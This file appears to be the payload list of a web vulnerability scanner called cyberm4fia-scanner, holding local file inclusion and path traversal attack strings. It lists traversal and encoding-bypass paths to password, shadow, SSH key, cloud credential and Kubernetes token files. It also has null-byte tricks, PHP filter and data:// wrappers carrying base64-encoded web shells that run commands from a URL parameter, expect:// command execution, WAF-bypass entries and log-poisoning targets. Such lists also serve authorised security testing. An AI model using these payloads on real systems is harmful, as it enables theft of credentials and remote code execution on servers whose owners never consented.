# LFI Payloads — cyberm4fia-scanner
# Categories: Linux, Windows, Encoding, PHP Wrappers, Log Poisoning, Bypass, Docker, Cloud

# ─── Linux Basic Traversal ───
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
/etc/passwd
/etc/shadow
/etc/hosts
/etc/hostname
/etc/issue
/etc/motd
/etc/group
/etc/resolv.conf
/etc/crontab
/etc/fstab
/etc/shells
/etc/os-release
/etc/lsb-release
/etc/environment

# ─── Linux Config Files ───
/etc/apache2/apache2.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/apache2/ports.conf
/etc/apache2/envvars
/etc/httpd/conf/httpd.conf
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled/default
/etc/nginx/conf.d/default.conf
/etc/mysql/my.cnf
/etc/mysql/mysql.conf.d/mysqld.cnf
/etc/mysql/debian.cnf
/etc/php/7.4/apache2/php.ini
/etc/php/8.0/apache2/php.ini
/etc/php/8.1/apache2/php.ini
/etc/php/8.2/apache2/php.ini
/etc/php/8.3/apache2/php.ini
/usr/local/etc/php/php.ini
/etc/ssh/sshd_config
/etc/ssh/ssh_config
/etc/vsftpd.conf
/etc/samba/smb.conf
/etc/security/limits.conf
/etc/sudoers
/etc/xinetd.conf
/etc/ld.so.conf
/etc/ld.so.conf.d/*.conf
/etc/exports
/etc/inetd.conf
/etc/pam.d/common-auth
/etc/pam.d/common-password

# ─── Linux Proc / System ───
/proc/self/environ
/proc/self/cmdline
/proc/self/status
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/fd/3
/proc/self/fd/4
/proc/self/fd/5
/proc/self/fd/6
/proc/self/fd/7
/proc/self/fd/8
/proc/self/fd/9
/proc/self/fd/10
/proc/self/fd/11
/proc/self/fd/12
/proc/self/fd/15
/proc/self/fd/255
/proc/self/cwd
/proc/self/exe
/proc/self/mounts
/proc/self/net/arp
/proc/self/net/tcp
/proc/self/net/udp
/proc/self/net/tcp6
/proc/self/net/route
/proc/self/maps
/proc/self/smaps
/proc/self/cgroup
/proc/self/loginuid
/proc/version
/proc/cpuinfo
/proc/meminfo
/proc/net/route
/proc/sched_debug
/proc/net/fib_trie
/proc/net/if_inet6
/proc/1/cmdline
/proc/1/environ
/proc/1/cgroup
/sys/class/net/eth0/address
/sys/class/dmi/id/product_name
/sys/class/dmi/id/sys_vendor

# ─── Linux Log Files (Log Poisoning) ───
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/syslog
/var/log/auth.log
/var/log/messages
/var/log/secure
/var/log/mail.log
/var/log/vsftpd.log
/var/log/mysql/error.log
/var/log/faillog
/var/log/lastlog
/var/log/wtmp
/var/log/btmp
/var/mail/root
/var/spool/cron/crontabs/root
/var/log/dpkg.log
/var/log/kern.log
/var/log/daemon.log
/var/log/alternatives.log
/var/log/apt/history.log
/var/log/apt/term.log
/var/log/mongodb/mongod.log
/var/log/redis/redis-server.log
/var/log/postgresql/postgresql-*-main.log

# ─── Linux SSH / User Files ───
/root/.bash_history
/root/.bashrc
/root/.profile
/root/.ssh/id_rsa
/root/.ssh/id_rsa.pub
/root/.ssh/authorized_keys
/root/.ssh/known_hosts
/root/.ssh/config
/root/.ssh/id_ed25519
/root/.ssh/id_ecdsa
/root/.mysql_history
/root/.wget-hsts
/root/.gitconfig
/root/.viminfo
/root/.nano_history
/home/www-data/.bash_history
~/.bash_history
~/.ssh/id_rsa
~/.ssh/id_ed25519
~/.aws/credentials
~/.aws/config
~/.docker/config.json

# ─── Windows Paths ───
..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\..\..\windows\system32\drivers\etc\hosts
\windows\system32\drivers\etc\hosts
..\..\..\..\windows\win.ini
..\..\..\..\windows\system.ini
..\..\..\..\boot.ini
\windows\win.ini
..\..\..\..\inetpub\wwwroot\web.config
..\..\..\..\inetpub\logs\logfiles
\windows\system32\config\sam
\windows\system32\config\system
\windows\system32\config\regback\sam
\windows\debug\netsetup.log
\windows\repair\sam
\windows\repair\system
\windows\repair\software
C:\windows\system32\drivers\etc\hosts
C:\windows\win.ini
C:\boot.ini
C:\inetpub\wwwroot\web.config
C:\windows\system32\license.rtf
C:\windows\system32\eula.txt
C:\windows\system32\config\AppEvent.Evt
C:\windows\system32\config\SecEvent.Evt
C:\windows\System32\inetsrv\config\applicationHost.config
C:\inetpub\logs\LogFiles\W3SVC1\
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\mysql\data\mysql\user.MYD
C:\xampp\php\php.ini
C:\wamp\bin\apache\apache2.4.9\conf\httpd.conf
C:\Users\Administrator\NTUser.dat
C:\Users\Administrator\.ssh\id_rsa
C:\ProgramData\MySQL\MySQL Server 5.7\my.ini

# ─── Encoding Bypass ───
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
..%2f..%2f..%2fetc/passwd
..%2f..%2f..%2f..%2fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%252f..%252f..%252fetc/passwd
%252e%252e%252f%252e%252e%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc/passwd
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc/passwd
..%255c..%255c..%255cetc/passwd
..%c1%9c..%c1%9c..%c1%9cetc/passwd
..%bg%qf..%bg%qf..%bg%qfetc/passwd
..%25%35%63..%25%35%63..%25%35%63etc/passwd
..%e0%80%af..%e0%80%af..%e0%80%afetc/passwd
..%c0%2f..%c0%2f..%c0%2fetc/passwd
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd
..%u2215..%u2215..%u2215etc/passwd
..%u2216..%u2216..%u2216etc/passwd
..0x2f..0x2f..0x2fetc/passwd
..%5c..%5c..%5cetc/passwd
....\\....\\....\\etc\\passwd
..\/..\/..\/etc/passwd
..\/../..\/../etc/passwd

# ─── Null Byte & Truncation ───
../../../etc/passwd%00
../../../etc/passwd%00.html
../../../etc/passwd%00.php
../../../etc/passwd%00.jpg
../../../etc/passwd%2500
../../../etc/passwd\0
../../../etc/passwd............................
../../../etc/passwd%00.png
../../../etc/passwd%00.txt
../../../etc/passwd%00.pdf
../../../etc/passwd/.

# ─── PHP Wrappers ───
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=config.php
php://filter/convert.base64-encode/resource=../config.php
php://filter/convert.base64-encode/resource=../../config.php
php://filter/convert.base64-encode/resource=login.php
php://filter/convert.base64-encode/resource=admin.php
php://filter/convert.base64-encode/resource=db.php
php://filter/convert.base64-encode/resource=connect.php
php://filter/convert.base64-encode/resource=database.php
php://filter/convert.base64-encode/resource=settings.php
php://filter/convert.base64-encode/resource=.env
php://filter/convert.base64-encode/resource=../../../wp-config.php
php://filter/read=string.rot13/resource=index.php
php://filter/read=convert.iconv.utf-8.utf-16/resource=index.php
php://filter/zlib.deflate/convert.base64-encode/resource=index.php
php://filter/convert.iconv.utf-8.utf-7/resource=index.php
php://filter/convert.iconv.UTF-8.CSISO2022KR/resource=index.php
php://filter/read=string.strip_tags/resource=index.php
php://input
php://stdin
php://memory
php://temp
php://fd/0
php://fd/1
php://fd/2
data://text/plain,<?php system('id'); ?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
data://text/plain,<?php phpinfo(); ?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==
expect://id
expect://whoami
expect://ls
expect://uname -a
phar://test.phar/test.txt
zip://test.zip#test.txt
jar:file:///tmp/test.jar!/test.txt
compress.zlib://file:///etc/passwd
compress.bzip2://file:///etc/passwd

# ─── Web Application Files ───
../../../var/www/html/index.php
../../../var/www/html/config.php
../../../var/www/html/wp-config.php
../../../var/www/html/.env
../../../var/www/html/database.php
../../../var/www/html/connect.php
../../../usr/local/apache2/conf/httpd.conf
../../../usr/local/nginx/conf/nginx.conf
../../../opt/lampp/etc/httpd.conf
../../../xampp/apache/conf/httpd.conf
../../../var/www/html/.htaccess
../../../var/www/html/.htpasswd
../../../var/www/html/robots.txt
../../../var/www/html/sitemap.xml
../../../var/www/html/composer.json
../../../var/www/html/package.json
../../../var/www/html/.git/config
../../../var/www/html/.git/HEAD
../../../var/www/html/Dockerfile
../../../var/www/html/docker-compose.yml
../../../var/www/html/Gemfile
../../../var/www/html/Gruntfile.js
../../../var/www/html/gulpfile.js

# ─── Docker / Container ───
/proc/1/cgroup
/.dockerenv
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/ca.crt
/run/secrets/kubernetes.io/serviceaccount/namespace
/var/run/secrets/kubernetes.io/serviceaccount/token
/proc/self/mountinfo
/proc/1/mountinfo
/proc/mounts
/etc/mtab
/proc/self/cgroup
/.docker/config.json

# ─── Cloud / CI/CD Config ───
~/.aws/credentials
~/.aws/config
~/.azure/credentials
~/.kube/config
~/.config/gcloud/credentials.db
~/.config/gcloud/application_default_credentials.json
/var/run/secrets/kubernetes.io/serviceaccount/token
/etc/kubernetes/admin.conf
~/.jenkins/secrets/initialAdminPassword
/etc/gitlab-runner/config.toml
/opt/gitlab/etc/gitlab.rb

# ─── Node.js / Python / Ruby ───
../../../package.json
../../../package-lock.json
../../../.env
../../../settings.py
../../../manage.py
../../../requirements.txt
../../../Pipfile
../../../Gemfile
../../../config/database.yml
../../../config/secrets.yml
../../../.npmrc
../../../yarn.lock
../../../tsconfig.json
../../../webpack.config.js

# ─── Advanced WAF Bypass Wrappers ───
php://filter/read=convert.base64-encode/resource=
php://filter/convert.iconv.utf-8.utf-16/resource=
php://filter/zlib.deflate/convert.base64-encode/resource=
expect://id
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOz8+
zip://evil.zip#shell.php
phar://evil.phar/shell.php

# ─── Log Poisoning Targets ───
/var/log/apache2/access.log
/var/log/httpd/access_log
/var/log/nginx/access.log
/var/log/auth.log
/var/log/vsftpd.log
/proc/self/environ
/proc/self/cmdline
/proc/self/fd/0

# ─── Windows Targets ───
c:\windows\win.ini
c:\windows\system32\drivers\etc\hosts
c:\boot.ini
%WINDIR%\win.ini
